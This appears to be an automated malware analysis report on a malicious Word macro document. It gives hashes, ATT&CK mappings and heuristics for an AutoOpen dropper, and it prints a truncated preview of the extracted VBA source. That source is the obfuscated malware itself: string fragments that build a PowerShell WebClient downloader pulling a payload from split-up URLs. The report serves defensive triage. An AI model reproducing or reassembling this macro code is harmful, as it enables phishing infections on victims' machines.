Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dec1650048f6af6c…

MALICIOUS

Office (OLE)

159.0 KB First seen: 2017-12-24
MD5: 812b6a5a284450763c0977b6ac26a4e3 SHA-1: e35c8bdc8a458a5720b8c4ce05033a2c2925c9e4 SHA-256: dec1650048f6af6c70fad529bd356a7d112c053b25f1b4daf42d7026af2c4fed
262 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The OLE document contains VBA macros, including an AutoOpen function, which is designed to execute automatically upon opening. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, strongly suggesting that the macro attempts to download and execute a secondary payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports a dropper or downloader role, likely used in phishing campaigns.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 162,816 bytes but its declared streams total only 24,543 bytes — 138,273 bytes (85%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 54708 bytes
SHA-256: 6893745c4e8cc02895a0c56ea0dec2593d0c385def9502ffb1d6d7fb93fffd1a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "kXSIJjXw"
Function CHPFIHiQTjTW()
wjwOJEEbiJ = UCase("twmzmFp" + "IpGbrhVLXD" + "VMUTpmsFfvvHrR" + "jsTJHWpSGnzJ" + "XtANYBApY") + UCase("zNtzJcMiOKG" + "dsNvbju" + "jpciilvhj" + "QwIPVvNWfptFk" + "HXQHzdaTuJwHlO")
ZFwiXi = Mid("fTwsuQZwnTP4aZw-objeerp+erpc'+'t Syserp+erpte'+'rp+erpem.Net.e'+'rp+ekV+ekVerpWeberp+erpClierp+erpent;i3wnsaderp+erpasd erp+eekV+ekVrp= nerp+er'+'pewerp+erp-object random;i3erp+jY1zKDkGdq0mwomPrj6mzEi", 15, 163)
zJDXQsIPK = UCase("ritTnGRkj" + "YXLuFMcRP" + "lwzWiXWlwI" + "JsDjnjfsO" + "CBCzkMbdQZ") + UCase("WEdthWlQkf" + "YzOfHLRjzZACj" + "uXwKvHfjrnnapG" + "ubiqOcFl" + "EPMkbzW")
fWraiqpGPqP = UCase("XhfwYtJsN" + "RhFAEVbEcX" + "VnhGPzBw" + "NKwEIIOGMF" + "fDlivUTqoUDIrG") + UCase("tzsIwIu" + "IHjAsvHVsXZfRB" + "KvdLJwKCHzFOQN" + "JpkJcbM" + "auhzKlSbkr")
uSCaYc = UCase("GihzufCbOTR" + "uATtIsPEJj" + "aZbiVfMoPv" + "wnjYGLjHJEDEFd" + "tKCRlRZ") + UCase("HXTzjwBi" + "dzDfNkl" + "UBXQWUV" + "SlBlzJd" + "iYAnNCLHZB")
vjCQiURjQdn = Mid("5GCUU'+'HAR]36))ekV)  -rEpLACEekVzxpekV,7CvawA", 6, 35)
dvjPosaEYjW = UCase("iNSzkvwEcCnhqI" + "NjuIZYwbDQczz" + "oWUWSiprs" + "OiWkRnN" + "rVXijcSZjmPjI") + UCase("wnnjSKXdzWrutu" + "OJPDlIi" + "GqsEtvCbLsSji" + "lVDSOVBrliXYVd" + "dWnTuhp")
CsHfbJdTukH = UCase("FZYjaQOQPCt" + "CzsOKAtDTWjA" + "jwqRqPqUtQftE" + "VjsOUknwpUo" + "GjzIjtX") + UCase("rSXzYmDQJhNUF" + "YUaILQAkIV" + "qIJWljlWNjC" + "tphjXpIH" + "uhIdiaiHqG")
tzCjAsSb = UCase("WhdazNH" + "AIBVQvk" + "OlZkNAdRi" + "TjSuvEFXrzpfaj" + "dcLvDaRL") + UCase("OMSnqVELsDt" + "jGMzPtDkbiK" + "bjXSWiVBVqfjm" + "hVvinWmiu" + "wzohNaAfBY")
sHWBiLv = Mid("rO1CW[ChAR]36 -CrEPlACEekVerpekV,[ChAR]39)) ') -CrePLAcE  ([Char]68+[Char]88+[Char]57),[Char]36-CrePLAcE  'ekV',[Char]39))OOMz1q1", 6, 117)
ioKolSOOGH = UCase("CVidutXA" + "wsqVIjSdjdv" + "NJvbAtDFDPWctJ" + "HDmdRIfWCq" + "VBIEXNLJoMnCt") + UCase("UuYiWNc" + "ILawzirimtkNXB" + "zrJRjVLTBtdwOH" + "jdLXtwdaNhSGZ" + "RfdTwZrMwsdzrY")
bjlMjEUF = UCase("GwloOhrG" + "acKwLhpzvoGtp" + "TYqoouq" + "hNEaXJp" + "oucBwVnpVj") + UCase("DjNSTRwSQXtD" + "CZvztlKf" + "WzLQnDzl" + "TIInQUu" + "IZrZBvrQzWap")
LWXaD = UCase("zcPNpubaCNI" + "tuWPuLptb" + "BlcoMplDTWnE" + "TkSzWzlH" + "izUNJITzp") + UCase("wSbdlBh" + "pztlbpiCibOS" + "paiHfUwfcjVhiF" + "sHjwpLwHZtViiG" + "rjWHIrsWGhi")
mZVwiwtZfi = Mid("FXuziB8riub'-J'+'oiekV+'+'ekVn'+'erperp)( ((erpi3werp+erpfrerp+e'+'rpanc =ekV+ekV neerp+erpYhKhu1", 12, 80)
jjfVJHldh = UCase("jVFvNNHCiuUiXZ" + "DOJaCIckoiVDTA" + "jWvEjmCrDGnii" + "WudWvMlNAnn" + "kQNrKnCr") + UCase("ziTpJAXFT" + "awGSnrhYo" + "TWIQcBl" + "LwzjmRYLKjm" + "NHjXNJiw")
ncGCw = UCase("MQXDsjo" + "XuRdksTJ" + "JpUYwsmKa" + "BAkaPGGkrBpdvp" + "GwRtXQYjIwrOjN") + UCase("ltRnnKnUCX" + "IcHYjuicsvV" + "DjdQbiXrZ" + "TQvLHCmTcO" + "tHwbkQzkEU")
YkwGEMSwlZn = UCase("bfdjBZbSRIfWt" + "TRYMlrnXmdFC" + "OoinCzl" + "YIlrYwHIJzFtt" + "NJozTEDsz") + UCase("wUNdjVdXIvv" + "mUMsfPdf" + "JLAbYzC" + "jmfJHsEliYo" + "ilwSEXTmaZ")
FoJHdGJrok = Mid("6BHdwja1BL7ofAB'V+ekV+erptiekV+ekVerp+erpbeer.it/Cerp+erplerp+erpvRerp+erpA/erp+erpDTXerp+erp.'+'ekV+ekVSperp+ee'+'kV+ekVrplit(erp+erpDerp+erpTX,DTX);ierp+erp3'+'werp+erpkarapasemEQiYnnzpvMD", 16, 163)
NFZBE = UCase("QcNGJtLqffF" + "IrcUmbpZTGuK" + "horNZGUBrA" + "wAtsHmjqn" + "nkHwLIPvIJ") + UCase("DhcEUcGZkjRr" + "WliwSjWD" + "DtEjRNzFGi" + "kuTQnmKdRDlVs" + "aaaSdcnfjiiAkL")
KfjEBAHPXDu = UCase("PUdpIMCLVasbI" + "zicIHBqoK" + "XNiWBjQEH" + "QpiDwYbNTuqJqD" + "sriTXwa") + UCase("LRvijKpK" + "UJwKAYMiZdVQb" + "XiQIplkjA" + "fSlBtvCdkCpjE" + "rSSkwVFtkEXzQB")
DInSZNEv = UCase("BtkNNvscks" + "juCScElaPIMMcL" + "GdwTmDzOUjm" + "iYrnQOzazUGjT" + "aFNojHCmoOiQF") + UCase("jjimqRDCXUwwdk" + "mXRAwdrBjzi" + "wjdJzIFqRmUp" + "kXissii" + "ICrMQHQsi")
jiUzfYPLN = Mid("1HKLd5QB4RtFZN0mvS8uV+'erpekV+ekVwa'+'ekV+ekVerp+erpbc.ToString(
... (truncated)